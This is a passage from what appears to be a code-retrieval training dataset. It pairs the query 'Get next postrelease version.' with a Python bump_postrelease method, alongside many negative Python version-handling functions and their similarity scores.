self.u.get_next_version(version=U.UCS_Version((MAJOR, MINOR, PATCH)))\n self.assertEqual('%d.%d-%d' % (MAJOR, MINOR, PATCH + 1), ver)", "def get_stable(self: _R) -> _R:\n return self._replace(\n BaseVersion(\n epoch=0,\n release=(self.major, self.minor, self.micro),\n pre=None,\n post=None,\n dev=None,\n local=None,\n )\n )", "def bump_micro(self: _R, inc: int = 1) -> _R:\n if not self.is_stable:\n return self.get_stable().bump_micro(inc - 1)\n\n return self._replace(\n BaseVersion(\n epoch=0,\n release=(self.major, self.minor, self.micro + inc),\n pre=None,\n post=None,\n dev=None,\n local=None,\n )\n )", "def is_release():\n return VERSION[-1]", "def test_get_next_version_PATCH99(self):\n self._uri({\n '%d.%d/maintained/%d.%d-%d/' % (MAJOR, MINOR, MAJOR, MINOR, 100): '',\n '%d.%d/maintained/%d.%d-%d/' % (MAJOR, MINOR + 1, MAJOR, MINOR + 1, 0): '',\n })\n ver = self.u.get_next_version(version=U.UCS_Version((MAJOR, MINOR, 99)))\n self.assertEqual('%d.%d-%d' % (MAJOR, MINOR + 1, 0), ver)", "def calculate_new_release_version(version):\n split_version_string = version.split(\".\")\n part_zero = split_version_string[0]\n part_one = int(split_version_string[1]) + 1\n part_two = split_version_string[2]\n new_version = f\"{part_zero}.{part_one}.{part_two}\"\n return new_version", "def compute_version_for_latest(project_name, org_name, repo_name, distro_name):\n #TODO: update for h turtle\n assert distro_name in ['fuerte', 'groovy']\n if distro_name == 'fuerte':\n release = 'lucid'\n else:\n release = 'precise'\n project_name = project_name.replace('_', '-')\n prefix = 'debian/ros-%s-%s_'%(distro_name, project_name)\n suffix = '_%s'%(release)\n tags = list_tags(org_name, repo_name, prefix)\n tags = [t[:-len(suffix)] for t in tags if t.endswith(suffix)]\n if not tags:\n return None\n print(\"TAGS\", [t[len(prefix):] for t in tags])\n \n versions = sorted([distutils.version.LooseVersion(t[len(prefix):]) for t in tags])\n if 
not versions:\n return None\n version = versions[-1].vstring #for pattern\n return '%s%s%s'%(prefix, version, suffix)", "def get_version_string():\n major, minor, micro, patch, tag, relnum, is_release = VERSION\n\n version = '%s.%s' % (major, minor)\n\n if micro or patch:\n version += '.%s' % micro\n\n if patch:\n version += '.%s' % patch\n\n if tag != 'final':\n if tag == 'rc':\n version += ' RC'\n else:\n version += ' %s ' % tag\n\n version += '%s' % relnum\n\n if not is_release:\n version += ' (dev)'\n\n return version", "def test_get_next_version_MINOR(self):\n self._uri({\n '%d.%d/maintained/%d.%d-%d/' % (MAJOR, MINOR + 1, MAJOR, MINOR + 1, 0): '',\n })\n ver = self.u.get_next_version(version=U.UCS_Version((MAJOR, MINOR, PATCH)))\n self.assertEqual('%d.%d-%d' % (MAJOR, MINOR + 1, 0), ver)", "def get_current_release():\n return _CURRENT_RELEASE", "def get_version():\n vers = [\"%(major)i.%(minor)i\" % __version_info__, ]\n\n if __version_info__['micro']:\n vers.append(\".%(micro)i\" % __version_info__)\n if __version_info__['releaselevel'] != 'final':\n vers.append('%(releaselevel)s' % __version_info__)\n return ''.join(vers)", "def current_version(self):\n try:\n return self.release_set.order_by('-created')[0].version\n except IndexError:\n return \"0.0.0\"", "def get_latest_release_version():\n repo = GITHUB.get_user(GITHUB_OWNER).get_repo(GITHUB_REPO)\n latest_release_version = repo.get_latest_release().tag_name\n return latest_release_version", "def test_changeVersionsWithPrerelease(self):\n self._testVersionChanging(9, 2, 7, 38)", "def update_version() -> str:\n cur_version = get_current_version(args.stage)\n\n if args.stage == \"prod\":\n prv_version = get_current_version(stage='staging')\n new_version = semver.finalize_version(prv_version)\n elif args.stage == \"staging\":\n prv_version = get_current_version(stage='integration')\n assert '-integration' in prv_version\n new_version = prv_version.replace('-integration', '-rc') # don't bump the version number\n else:\n new_version = getattr(semver, f'bump_{args.release}')(str(cur_version))\n new_version = new_version if semver.parse_version_info(new_version).prerelease \\\n else semver.bump_prerelease(new_version, token='integration')\n\n if cur_version == new_version:\n print(\"Nothing to promote\")\n exit(0)\n else:\n print(f\"Upgrading: {cur_version} -> {new_version}\")\n return new_version", "def update_pkg_version(self, production: bool) -> str:\n return (\n self.get_prerelease_package_version(production) if self.mpy_version == \"latest\" else self.get_next_package_version(production)\n )", "def get_min_build_version(version: str) -> str:\n return Version(version).replace(micro=0).get_stable().dumps()", "def test_get_next_version(self):\n ver = self.u.get_next_version(version=U.UCS_Version((MAJOR, MINOR, PATCH)))\n self.assertEqual(None, ver)", "def get_max_build_version(version: str) -> str:\n return Version(version).bump_minor().get_stable().dumps()", "def get_latest_schemaorg_version():\n tag_name = requests.get(SCHEMAORG_VERSION_URL).json()[\"tag_name\"] # \"v13.0-release\"\n mat = re.match(r\"v([\\d.]+)-release\", tag_name)\n if not mat:\n raise ValueError(f\"Unrecognized release tag name {tag_name}\")\n latest = mat.group(1)\n return latest", "def get_version():\n return '%d.%d.%d' % version_info", "def get_latest_release(account = None):\n names = get_db_name(account=account, db_type=\"compara\")\n compara = []\n for name in names:\n compara += [int(name.Release)]\n return str(max(compara))", "def 
test_get_next_version_MAJOR(self):\n self._uri({\n '%d.%d/maintained/%d.%d-%d/' % (MAJOR + 1, 0, MAJOR + 1, 0, 0): '',\n })\n ver = self.u.get_next_version(version=U.UCS_Version((MAJOR, MINOR, PATCH)))\n self.assertEqual('%d.%d-%d' % (MAJOR + 1, 0, 0), ver)", "def bump(self, *, rc: int = 0) -> str:\n try:\n current = Version(self.pkg_version)\n assert isinstance(current, Version)\n # bump the version\n self.pkg_version = str(bump_version(post_bump=True, current=current, rc=rc))\n except Exception as e: # pragma: no cover\n log.error(f\"Error: {e}\")\n return self.pkg_version", "def __getattr__(self, name):\n if name in ('epoch', 'release', 'pre', ):\n return getattr(self._version, name)\n if name in ('post', 'dev'):\n attr = getattr(self._version, name)\n return attr[1] if attr else None\n if name == 'is_devrelease':\n return self.dev is not None\n\n parts = ('major', 'minor', 'micro')\n try:\n index = parts.index(name)\n except ValueError:\n raise AttributeError('{!r} object has to attribute {!r}'\n .format(type(self).__name__, name)) from None\n release = self.release\n return release[index] if len(release) >= index + 1 else 0", "def get_increased_version():\n logs = get_rolling_log_history()\n\n if has_breaking_changes(logs):\n return get_increased_base_version(0)\n if has_features(logs):\n return get_increased_base_version(1)\n if has_fixes(logs):\n return get_increased_base_version(2)", "def select_release():\n release_version = unitdata.kv().get(OPENSTACK_RELEASE_KEY, None)\n if release_version is None:\n release_version = os_utils.os_release('keystone')\n unitdata.kv().set(OPENSTACK_RELEASE_KEY, release_version)\n return release_version", "def commcare_minor_release(self):\n return '%d.%d' % self.build_spec.minor_release()", "def test_get_next_version_MAJOR99(self):\n self._uri({\n '%d.%d/maintained/%d.%d-%d/' % (100, 0, 100, 0, 0): '',\n })\n ver = self.u.get_next_version(version=U.UCS_Version((99, MINOR, PATCH)))\n self.assertEqual(None, ver)", "def get_version(version=VERSION, date=DATE):\n return \"JoMRS v{} Modular Rigging System | last update {}\".format(\n \".\".join([i for i in version]), \"/\".join([x for x in date])\n )", "def bump_postrelease(self: _R, inc: int = 1) -> _R:\n post = (VersionParts.POST, max(inc, 1))\n base_post: Optional[Tuple[str, int]] = self._version.post\n if base_post:\n post = (VersionParts.POST, max(base_post[1], 1) + inc)\n base = BaseVersion(\n epoch=0,\n release=self._version.release,\n pre=None,\n post=post,\n dev=None,\n local=None,\n )\n return self._replace(base)", "def bump_tag(\n tag: Optional[semantic_version.Version],\n change_type: int) -> semantic_version.Version:\n if tag is None:\n return semantic_version.Version('0.0.1')\n\n if change_type == constants.MAJOR:\n return tag.next_major()\n\n if change_type == constants.MINOR:\n return tag.next_minor()\n\n return tag.next_patch()", "def getversion():\r\n\r\n global VERSION\r\n\r\n if len(VERSION) == 3:\r\n return '{}.{}.{}'.format(VERSION[0], VERSION[1], VERSION[2])\r\n else:\r\n return '{}.{}.{}-{}'.format(VERSION[0], VERSION[1], VERSION[2], VERSION[3])", "def get_latest_release(self):\n cs = Custom_Soup(\n \"latest_release\", \"https://chromedriver.storage.googleapis.com/LATEST_RELEASE_\" + str(self.version))\n cs.get_request()\n self.latest_release = cs.get_text()", "def get_build_version():\n package_version = __version__\n tags = (\n subprocess.run(\n [\"/usr/bin/git\", \"tag\", \"--points-at\", \"HEAD\"],\n cwd=os.path.dirname(os.path.realpath(__file__)),\n stdout=subprocess.PIPE,\n 
check=True,\n )\n .stdout.decode(\"utf-8\")\n .strip(\"\\n\")\n .split(\"\\n\")\n )\n commit_id = (\n subprocess.run(\n [\"/usr/bin/git\", \"rev-parse\", \"--short\", \"HEAD\"],\n cwd=os.path.dirname(os.path.realpath(__file__)),\n stdout=subprocess.PIPE,\n check=True,\n )\n .stdout.decode(\"utf-8\")\n .strip(\"\\n\")\n )\n\n version_tags = _select_version_tags(tags)\n if len(version_tags) > 1:\n raise exc.QgrVersionError(\n f\"Can not determine desired version from tags: {tags}\",\n )\n\n if len(version_tags) == 1:\n version = version_tags[0]\n else:\n # If there is no version tag, build a unique version string\n version = f\"{package_version}-{commit_id}\"\n\n return version", "def get_version():\n click.echo(get_current_version_number())", "def read_release_version():\n with open(\"RELEASE-VERSION\", \"r\") as f:\n return f.readline().strip()", "def test_getNextVersionAfterYearChange(self):\n now = date.today()\n major = now.year - VERSION_OFFSET\n version = Version(\"twisted\", major - 1, 9, 0)\n self.assertEquals(getNextVersion(version, now=now),\n Version(\"twisted\", major, 0, 0))", "def test_getNextVersion(self):\n now = date.today()\n major = now.year - VERSION_OFFSET\n version = Version(\"twisted\", major, 9, 0)\n self.assertEquals(getNextVersion(version, now=now),\n Version(\"twisted\", major, 10, 0))", "def get_latest_version(self):\n latest_release = self._http_client.get(self._github_repo + '/releases/latest')\n if not 'tag_name' in latest_release.json():\n return None\n version = latest_release.json()['tag_name']\n latest_release.close()\n return version", "def test_get_next_version_MINOR99(self):\n self._uri({\n '%d.%d/maintained/%d.%d-%d/' % (MAJOR, 100, MAJOR, 100, 0): '',\n '%d.%d/maintained/%d.%d-%d/' % (MAJOR + 1, 0, MAJOR + 1, 0, 0): '',\n })\n ver = self.u.get_next_version(version=U.UCS_Version((MAJOR, 99, 0)))\n self.assertEqual('%d.%d-%d' % (MAJOR + 1, 0, 0), ver)", "def get_github_library_version(name, url):\n while True:\n # For the release, make sure the default versions do not include \"-dev\"\n version = raw_input(\"Version of %s?: \" % name)\n if not url_exists(\"%s/releases/tag/%s\" % (url, version)):\n print_warning(\"The version of %s is not valid. 
Ensure you've chosen a correct value by checking the \"\n \"GitHub releases for exact naming at \"\n \"%s/releases before you continue.\" % (name, url))\n return version", "def get_version():\n return 1", "def get_release(self, is_vertebrate: bool) -> int:\n ext = \"/info/data/?\" if is_vertebrate else \"/info/eg_version?\"\n ret = retry(request_json, 3, self._url, ext)\n return int(ret[\"releases\"][0] if is_vertebrate else ret[\"version\"])", "def bump_release(\n self: _R,\n release_type: Literal[\"major\", \"minor\", \"micro\"] = VersionParts.MICRO,\n inc: int = 1,\n ) -> _R:\n if release_type == VersionParts.MAJOR:\n return self.bump_major(inc)\n if release_type == VersionParts.MINOR:\n return self.bump_minor(inc)\n\n return self.bump_micro(inc)", "def get_package_version():\n major, minor, micro, patch, tag, relnum = __version_info__\n\n version = '%s.%s' % (major, minor)\n\n if micro or patch:\n version += '.%s' % micro\n\n if patch:\n version += '.%s' % patch\n\n if tag != 'final':\n version += '%s%s' % (\n {\n 'alpha': 'a',\n 'beta': 'b',\n }.get(tag, tag),\n relnum)\n\n return version", "def main(args: argparse.Namespace) -> None:\n if args.is_rc and args.is_dev:\n raise ValueError(\"A release version cannot be both RC and dev.\")\n if args.is_rc:\n assert args.rc is not None, \"rc field must be specified if is_rc is specified\"\n assert args.rc >= 1, \"RC version must start from 1.\"\n else:\n assert args.rc is None, \"is_rc must be specified in order to specify rc field\"\n update_cmake(args.major, args.minor, args.patch)\n update_pypkg(\n args.major,\n args.minor,\n args.patch,\n is_rc=args.is_rc,\n is_dev=args.is_dev,\n rc_ver=args.rc,\n )", "def increment_milestone_version(old_version, release_type):\n if release_type == \"milestone\":\n if \"b\" in old_version[-1]:\n # Not the first milestone\n new_version_parts = old_version[:-1]\n next_milestone = int(old_version[-1][2:]) + 1\n new_version_parts.append(\"0b{}\".format(next_milestone))\n else:\n new_version_parts = increment_version(old_version, (1, 0, 0))\n new_version_parts.append(\"0b1\")\n elif release_type == \"rc\":\n new_version_parts = old_version[:-1]\n if \"b\" in old_version[-1]:\n # First RC\n new_version_parts.append(\"0rc1\")\n else:\n next_rc = int(old_version[-1][3:]) + 1\n new_version_parts.append(\"0rc{}\".format(next_rc))\n else:\n raise ValueError(\"Unknown release type {!r}\".format(release_type))\n return new_version_parts", "def version_max():\n return VERSION_MAX", "def get_new_build(old_version, new_version, build):\n\n # Version did not change, increment the current build number\n if old_version == new_version:\n return str(int(build) + 1)\n\n # Version changed, start over at 1\n else:\n return str(1)", "def get_latest_tf_version(include_prerelease: bool = False) -> str:\n return get_available_tf_versions(include_prerelease)[0]", "def get_version():\n git_root = find_git_root(dirname(__file__))\n\n if git_root is not None:\n # Get the version using \"git describe\".\n cmd = \"git describe --tags --match [0-9]*\".split()\n try:\n version = subprocess.check_output(cmd).decode().strip()\n except subprocess.CalledProcessError:\n logger.exception(\"Unable to get version number from git tags\")\n exit(1)\n\n # PEP 386 compatibility\n if \"-\" in version:\n version = \".post\".join(version.split(\"-\")[:2])\n\n # Don't declare a version \"dirty\" merely because a time stamp has\n # changed. 
If it is dirty, append a \".dev1\" suffix to indicate a\n # development revision after the release.\n with open(os.devnull, \"w\") as fd_devnull:\n subprocess.call([\"git\", \"status\"], stdout=fd_devnull, stderr=fd_devnull)\n\n cmd = \"git diff-index --name-only HEAD\".split()\n try:\n dirty = subprocess.check_output(cmd).decode().strip()\n except subprocess.CalledProcessError:\n logger.exception(\"Unable to get git index status\")\n exit(1)\n\n if dirty != \"\":\n version += \".dev1\"\n\n return version\n\n else:\n try:\n return pkg_resources.working_set.by_key[\"graphql-validate\"].version\n except KeyError:\n return \"0.0.0-unreleased\"", "def bump_minor(self: _R, inc: int = 1) -> _R:\n if not self.is_stable and self.micro == 0:\n return self.get_stable().bump_minor(inc - 1)\n\n return self._replace(\n BaseVersion(\n epoch=0,\n release=(self.major, self.minor + inc, 0),\n pre=None,\n post=None,\n dev=None,\n local=None,\n )\n )", "def current_version(self):\n if self.current_tag:\n version = self.current_tag.lstrip('v')\n else:\n version = None\n\n if version and not version_is_valid(version):\n version = None\n\n return version", "def get_version(cls) -> str:\n if not cls.is_available():\n return 'None'\n else:\n import pkg_resources\n try:\n return pkg_resources.get_distribution('ncnn').version\n except Exception:\n return 'None'", "def previous():\n releases_list = releases()\n try:\n return releases_list[-2]\n except IndexError:\n return None", "def get_recent_release_from_product_details() -> int:\n rls_prod_details_json = get(\n \"https://product-details.mozilla.org/1.0/firefox_history_major_releases.json\"\n ).json()\n rls_prod_details = Series(rls_prod_details_json).sort_values(ascending=True)\n [(cur_rls_vers, _date)] = rls_prod_details[-1:].iteritems()\n cur_rls_maj, *_v = cur_rls_vers.split(\".\")\n return int(cur_rls_maj)", "def get_version():\n\n with open('__init__.py') as f:\n for line in f.readlines():\n if '__version__' in line:\n apicem_version = line.strip().split(\"=\")[-1].strip(\" '\")\n if '__first_release_date__' in line:\n first_release_data_str = line.strip().split(\"=\")[-1].strip(\" '\")\n first_release_data = date(*[int(num) for num in first_release_data_str.split('.')])\n num_commits = get_cr_num(first_release_data)\n return '{apicem_version}.{num_commits}'.format(\n apicem_version=apicem_version, num_commits=num_commits)\n\n raise ValueError(\"could not read version\")", "def version_min():\n return VERSION_MIN", "def latest_version(self) -> AwesomeVersion | None:\n return self.sys_updater.version_cli", "def get_version():\r\n return '.'.join((str(each) for each in VERSION[:3]))", "def minor_version(self) -> str:\n return pulumi.get(self, \"minor_version\")", "def get_distrib_version():\n distrib, version, codename = _get_release_infos() \n return version", "def main(self):\n logging.info(\"Doing release for %s\", self.version.raw)\n\n if self.version.branch is None:\n logging.debug(\"No branch, assuming '%s'. Override with --branch.\",\n self.options.branch)\n self.version.branch = self.options.branch\n\n # No version specified, assuming a snapshot release\n if self.options.version is None:\n self.do_release(\n version=MwVersion.new_snapshot(self.options.branch))\n return 0\n\n if self.options.previousversion:\n # Given the previous version on the command line\n self.do_release(version=self.version)\n return 0\n\n no_previous = False\n if self.version.prev_version is None:\n no_previous = True\n if not self.ask(\"No previous release found. 
Do you want to make a \"\n \"release with no patch?\"):\n logging.error('Please specify the correct previous release ' +\n 'on the command line')\n return 1\n if no_previous or self.options.no_previous:\n self.do_release(version=self.version)\n else:\n if not self.ask(\"Was %s the previous release?\" %\n self.version.prev_version):\n logging.error('Please specify the correct previous release ' +\n 'on the command line')\n return 1\n\n self.do_release(version=self.version)\n return 0", "def get_version_for(self,platform,version):\n def supports_platform(test_platforms):\n if test_platforms.upper() in ['ALL','ANY']:\n platforms = PLATFORMS\n else:\n platforms = test_platforms.split(':')\n return platform in platforms\n\n # Minimal required version check (for mainline releases)\n if self.min_versions:\n base_version = '.'.join(version.split('.')[:2])\n for base_min_version, min_version in (('.'.join(x.split('.')[:2]),x)\n for x in self.min_versions.split(';')):\n if compare_versions(base_version,base_min_version) == 0:\n if compare_versions(version,min_version) < 0:\n return None\n # Find the suitable test version\n candidate = '0'\n test = None\n for t in (t for t in self.versions if supports_platform(t.platform)):\n if compare_versions(version,t.firebird_version) >= 0:\n if compare_versions(candidate,t.firebird_version) < 0:\n candidate = t.firebird_version\n test = t\n return test", "def getVersion():\n try:\n fh=open(version_py, 'r')\n version=fh.read().strip().split('=')[-1].replace(\"'\",'').lstrip()\n fh.close()\n except:\n return None\n\n return version", "def version(self, version: Optional[str]) -> Optional[ChartVersionInfo]:\n if version is None or version == \"\":\n return self.latest\n\n versionspec = semantic_version.SimpleSpec(version)\n\n for r in self.versions:\n if versionspec.match(r.version_info):\n return r\n return None", "def next_version(file_):\n split_file = file_.rsplit(\"_\", 1)\n name_file = split_file[0]\n version = split_file[-1]\n padding = len(version)\n\n if version.isdigit():\n next_version = int(version) + 1\n next_version = str(next_version).zfill(padding)\n\n return concat(name_file, next_version, separator=\"_\")\n else:\n e = concat(file_, \" is incorrect.\")\n raise ValueError(e)", "def getversion(): # 3\n res,resargs = _msk.Env.getversion()\n if res != 0:\n raise Error(rescode(res),\"\")\n _major_return_value,_minor_return_value,_build_return_value,_revision_return_value = resargs\n return _major_return_value,_minor_return_value,_build_return_value,_revision_return_value", "def get_latest_version(model: str) -> str:\n if model in {\"small\", \"medium\", \"large\"}:\n model = f\"da_dacy_{model}_trf\"\n versions = [mdl.split(\"-\")[-1] for mdl in models_url if mdl.startswith(model)]\n versions = sorted(\n versions,\n key=lambda s: [int(u) for u in s.split(\".\")],\n reverse=True,\n )\n return versions[0]", "def get_version():\n return '.'.join(map(str, VERSION))", "def semver_from(changelog: Path) -> Version:\n with open(changelog) as f:\n matches = SEMVER_RE.finditer(f.read())\n versions: List[Version] = []\n is_unreleased = False\n for match in matches:\n version = match.groupdict()[\"version\"]\n if version.lower() == \"unreleased\":\n is_unreleased = True\n else:\n versions.append(Version.parse(version))\n\n versions.sort()\n latest = versions[-1]\n print(latest)\n return latest.bump_prerelease() if is_unreleased else latest", "def get_latest_version(self):\n try:\n version = self.sourcestudyversion_set.filter(\n i_is_deprecated=False\n ).order_by( 
# We can't use \"latest\" since it only accepts one field in Django 1.11.\n '-i_version',\n '-i_date_added'\n ).first()\n except ObjectDoesNotExist:\n return None\n return version", "def get_major_version(version):\n return str(check_version(version)[0])", "def patch_version(self) -> Optional[PatchVersion]:\n\n # for PBE: version is always \"main\"\n if self.solution.storage.url == RadsStorage.URL_PBE:\n return PatchVersion(\"main\")\n\n cache = self.solution.storage.fspath(f\"{self.path}/_patch_version\")\n if os.path.isfile(cache):\n logger.debug(f\"retrieving patch version for {self} from cache\")\n with open(cache) as f:\n version = f.read().strip()\n version = PatchVersion(version) if version else None\n else:\n version = self._retrieve_patch_version()\n if version is None:\n logger.warning(f\"failed to retrieve patch version for {self}\")\n else:\n with open(cache, 'w') as f:\n f.write(f\"{version}\\n\")\n return version", "def get_version():\n version = pkg_resources.require(\"sacredboard\")[0].version\n return version", "def latest_release_get():\n try:\n return json_response.success({'version': version.latest_version()})\n except version.Error as e:\n return json_response.error(str(e)), 200", "def get_version(self, name: str, version=None) -> int:\n division, is_vertebrate = self.get_division(name)\n if version is None:\n latest_version = self.get_release(is_vertebrate)\n return latest_version\n\n if not str(version).isdecimal():\n raise TypeError(\"Version must be a number\")\n version = int(version)\n\n all_versions = self.get_releases(is_vertebrate)\n ensembl = f\"Ensembl{'' if is_vertebrate else 'Genomes'}\"\n if version not in all_versions:\n raise ValueError(\n f\"{ensembl} release version {version} \"\n f\"not found. Available versions: {all_versions}\"\n )\n\n releases = self.releases_with_assembly(name)\n if version not in releases:\n raise FileNotFoundError(\n f\"{name} not found on {ensembl} release {version}. 
\"\n f\"Available on release versions: {releases}\"\n )\n return version", "def get_latest_version():\n found_version = \"unknown\"\n version_re = r\"^## \\[(\\d+\\.\\d+\\.\\d+)\\]\"\n\n with open(os.path.join(__repo_root__, \"CHANGELOG.md\")) as changelog_file:\n for line in changelog_file:\n found = re.search(version_re, line)\n if found:\n found_version = found.group(1)\n break\n\n return found_version", "def get_version():\n return \".\".join([str(i) for i in config[\"version\"]])", "def make_version_number(branch_name, build_number, tag, sha):\n branch_name_sanitized = sanitize_branch_name(branch_name)\n build_info = ['sha', sha, 'build', str(build_number), 'branch', branch_name_sanitized]\n prerelease = []\n if tag is not None:\n version = tag_to_version(tag)\n elif branch_name.startswith('release/') or branch_name.startswith('hotfix/'):\n version = tag_to_version(branch_name.split('/', 1)[1])\n prerelease = [str(build_number)]\n else:\n version = '0.0.0'\n prerelease = [str(build_number)]\n semver = semantic_version.Version(version)\n semver.prerelease = prerelease\n semver.build = build_info\n\n return semver", "def get_release_version():\n try:\n zipfile = glob.glob('adodb-*.zip')[0]\n except IndexError:\n print(\"ERROR: release zip file not found in '{}'\".format(release_path))\n sys.exit(1)\n\n try:\n version = re.search(\n r\"^adodb-([\\d]+\\.[\\d]+\\.[\\d]+)(-(alpha|beta|rc)\\.[\\d]+)?\\.zip$\",\n zipfile\n ).group(1)\n except AttributeError:\n print('''ERROR: unable to extract version number from '{}'\n Only 3 groups of digits separated by periods are allowed'''\n .format(zipfile))\n sys.exit(1)\n\n return version", "def make_semver(repo_root, build_number):\n branch_name, sha, tags = parse_describe(repo_root)\n if tags:\n # There are git tags to consider. Parse them all then choose the one that is latest (sorted by semver rules)\n return sorted([make_version_number(branch_name, build_number, tag, sha) for tag in tags])[-1]\n else:\n return make_version_number(branch_name, build_number, None, sha)", "def latest_version_number(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"latest_version_number\")", "def full_version(self) -> Optional[str]:\n full_version = None\n if self.version:\n full_version = self.version\n if self.release:\n full_version = \"{}-{}\".format(self.version, self.release)\n return full_version", "def latest_version(self):\n state = self.coordinator.data\n\n try:\n # fake a new update\n # return \"foobar\"\n return dict_get(state, \"firmware_update_info.base.version\")\n except KeyError:\n return None", "def version(self) -> Optional[str]:\n return pulumi.get(self, \"version\")", "def version(self) -> Optional[str]:\n return pulumi.get(self, \"version\")", "def version(self) -> Optional[str]:\n return pulumi.get(self, \"version\")", "def version(self) -> Optional[str]:\n return pulumi.get(self, \"version\")", "def version(self) -> Optional[str]:\n return pulumi.get(self, \"version\")" ]
[ "0.74618196", "0.73501813", "0.72785693", "0.6688966", "0.6573726", "0.6516371", "0.63295984", "0.632609", "0.61778533", "0.60363823", "0.60113215", "0.60052055", "0.59608686", "0.59551674", "0.594888", "0.5904299", "0.5897116", "0.5894186", "0.5864545", "0.58246434", "0.5817243", "0.5791231", "0.5765547", "0.57615733", "0.5755393", "0.5754202", "0.57332367", "0.5692867", "0.5688805", "0.5686454", "0.56781626", "0.5667542", "0.5663731", "0.5655082", "0.5612569", "0.56092936", "0.55995554", "0.5589893", "0.5568282", "0.55502385", "0.5549583", "0.55361277", "0.55353004", "0.5532048", "0.5522137", "0.55037934", "0.54915917", "0.54909885", "0.548253", "0.54819614", "0.54811734", "0.54712665", "0.5450533", "0.5440432", "0.5429597", "0.53926563", "0.5392306", "0.5391978", "0.5385671", "0.5377122", "0.53641266", "0.53627", "0.5349291", "0.5349026", "0.5339433", "0.53392726", "0.5332265", "0.5321469", "0.53175646", "0.53137815", "0.53048044", "0.52872324", "0.5268295", "0.52659875", "0.5261702", "0.5252461", "0.5252245", "0.52504784", "0.5223913", "0.52151406", "0.5212988", "0.5205764", "0.51982105", "0.5189427", "0.5184216", "0.51791716", "0.5177716", "0.51775324", "0.51650673", "0.5153049", "0.51472425", "0.51443434", "0.5137492", "0.5135685", "0.51265013", "0.5117633", "0.5117633", "0.5117633", "0.5117633", "0.5117633" ]
0.6240163
8
Get next postrelease version.
def bump_postrelease(self: _R, inc: int = 1) -> _R: post = (VersionParts.POST, max(inc, 1)) base_post: Optional[Tuple[str, int]] = self._version.post if base_post: post = (VersionParts.POST, max(base_post[1], 1) + inc) base = BaseVersion( epoch=0, release=self._version.release, pre=None, post=post, dev=None, local=None, ) return self._replace(base)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def next_version(major=False, minor=False, patch=True):\n try:\n r = Release.objects.latest()\n except Release.DoesNotExist:\n return Version('0.0.0')\n\n v = r.version\n if major:\n v = v.next_major()\n elif minor:\n v = v.next_minor()\n else:\n v = v.next_patch()\n return v", "def next_version(self):\n try:\n release = self.release_set.order_by('-created')[0]\n except IndexError:\n return \"0.1.0\"\n\n major, minor, bugfix = release.version.split(\".\")\n\n return \"{}.{}.{}\".format(major, int(minor) + 1, bugfix)", "def get_next_package_version(self, prod: bool = False) -> str:\n base = Version(self.pkg_version)\n if pypi_versions := get_pypi_versions(self.package_name, production=prod, base=base):\n self.pkg_version = str(pypi_versions[-1])\n return self.bump()", "def get_prerelease_package_version(self, production: bool = False) -> str:\n rc = 1\n if describe := get_git_describe(CONFIG.mpy_path.as_posix()):\n ver, rc, _ = describe.split(\"-\")\n base = bump_version(Version(ver), minor_bump=True)\n rc = int(rc)\n return str(bump_version(base, rc=rc))\n else:\n raise ValueError(\"cannot determine next version number micropython\")", "def get_release(self, is_vertebrate: bool) -> int:\n ext = \"/info/data/?\" if is_vertebrate else \"/info/eg_version?\"\n ret = retry(request_json, 3, self._url, ext)\n return int(ret[\"releases\"][0] if is_vertebrate else ret[\"version\"])", "def get_current_release():\n return _CURRENT_RELEASE", "def is_release():\n return VERSION[-1]", "def current_version(self):\n try:\n return self.release_set.order_by('-created')[0].version\n except IndexError:\n return \"0.0.0\"", "def get_latest_release_version():\n repo = GITHUB.get_user(GITHUB_OWNER).get_repo(GITHUB_REPO)\n latest_release_version = repo.get_latest_release().tag_name\n return latest_release_version", "def get_latest_release(account = None):\n names = get_db_name(account=account, db_type=\"compara\")\n compara = []\n for name in names:\n compara += [int(name.Release)]\n return str(max(compara))", "def get_latest_release(self):\n cs = Custom_Soup(\n \"latest_release\", \"https://chromedriver.storage.googleapis.com/LATEST_RELEASE_\" + str(self.version))\n cs.get_request()\n self.latest_release = cs.get_text()", "def get_latest_version(self):\n latest_release = self._http_client.get(self._github_repo + '/releases/latest')\n if not 'tag_name' in latest_release.json():\n return None\n version = latest_release.json()['tag_name']\n latest_release.close()\n return version", "def update_pkg_version(self, production: bool) -> str:\n return (\n self.get_prerelease_package_version(production) if self.mpy_version == \"latest\" else self.get_next_package_version(production)\n )", "def next_version(v: str) -> str:\n vobj = Version(v)\n if vobj.is_prerelease:\n return str(vobj.base_version)\n vs = list(vobj.release)\n vs[1] += 1\n vs[2:] = [0] * len(vs[2:])\n s = \".\".join(map(str, vs))\n if vobj.epoch:\n s = f\"{vobj.epoch}!{s}\"\n return s", "def get_last_release_id():\n url = \"https://api.github.com/repos/yt-dlp/yt-dlp/releases/latest\"\n try:\n with urlopen(url, timeout=10) as resp:\n return json.loads(resp.read().decode(\"utf-8\")).get(\"tag_name\", \"0\")\n except URLError as e:\n log(f\"YouTubeDLHelper error [get last release id]: {e}\")", "def get_release_version(self):\n return self.get_property(ADB.VERSION_RELEASE_PROPERTY)", "def get_version():\n return \"0.0.1 (prerelease prototype)\"", "def increment(version):\n release_version = os.environ.get(\"RELEASE_VERSION\", None)\n if release_version is 
not None:\n return release_version\n if isinstance(version, LegacyVersion):\n msg = \"\"\"{0} is considered a legacy version and does not\n support automatic incrementing. Please bring your version\n numbering into PEP440 standards and then it can be\n automatically incremented.\n \"\"\"\n raise Exception(msg.format(version))\n release_type = os.environ.get(\"RELEASE_TYPE\", \"micro\")\n v = version._version\n # epoch\n epoch_name, epoch = VersionUtils.get_version_number(v, 0, None, \"!\")\n pre_name, pre = VersionUtils.get_version_number(v, 3, None, \"pre\")\n post_name, post = VersionUtils.get_version_number(v, 4, None, \"post\")\n dev_name, dev = VersionUtils.get_version_number(v, 2, None, \"dev\")\n _, major = VersionUtils.get_version_number(v[1], 0, 0)\n _, minor = VersionUtils.get_version_number(v[1], 1, None)\n _, micro = VersionUtils.get_version_number(v[1], 2, None)\n\n # Handle dev/pre/post\n if release_type == \"pre\":\n micro, post, pre = VersionUtils.process_pre(micro, post, pre)\n\n if release_type == \"post\":\n dev, post = VersionUtils.process_post(dev, post)\n\n if release_type == \"dev\":\n dev = VersionUtils.process_dev(dev)\n\n if release_type == \"micro\":\n dev, micro, minor, post, pre = VersionUtils.process_micro(\n dev, micro, minor, post, pre\n )\n\n if release_type == \"minor\":\n dev, micro, minor, post, pre = VersionUtils.process_minor(\n dev, micro, minor, post, pre\n )\n\n if release_type == \"major\":\n dev, major, micro, minor, post, 